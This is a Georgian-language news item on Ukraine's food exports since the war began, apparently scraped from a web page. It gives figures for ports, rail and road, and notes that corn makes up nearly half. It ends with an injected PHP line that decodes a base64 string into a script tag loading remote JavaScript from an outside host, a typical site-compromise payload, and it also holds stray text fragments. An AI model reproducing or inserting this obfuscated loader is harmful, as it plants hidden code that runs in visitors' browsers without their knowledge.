celsiusi
ავერსი შნაიდერი
ომის დაწყების შემდეგ, ბოლო ხუთნახევარი თვის განმავლობაში უკრაინამ ექსპორტზე 10 მლნ ტონა სურსათი გაიტანა, მათ შორის 2 მლნ ტონა აგვისტოში, როდესაც ძალაში შევიდა შეთანხმება უკრაინის პორტების განბლოკვის შესახებ.
 
ინფორმაციას აგრარული პოლიტიკისა და სურსათის სამინისტრო ავრცელებს და წერს, რომ ის 8 მილიონი ტონა, რომელიც 1 აგვისტოსთვის პორტების გახსნამდე იქნა ექსპორტირებული, 2021 წლის ანალოგიურ პერიოდში ქვეყნის ექსპორტზე თითქმის ორნახევარჯერ ნაკლებია. ომის დროს 10 მლნ ტონა ექსპორტიდან 3,5 მილიონზე მეტი ექსპორტირებულია პორტებით, 3,1 მილიონი ტონა - სარკინიგზო, 1,1 მილიონი ტონა - საავტომობილო გზით.
 
უკრაინის სურსათის ექსპორტის თითქმის ნახევარი, 48,9%, სიმინდია, დანარჩენი კი მზესუმზირის თესლი, მზესუმზირის ზეთი, ხორბალი, ქერი და სხვა კულტურები და პროდუქტებია.
485
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");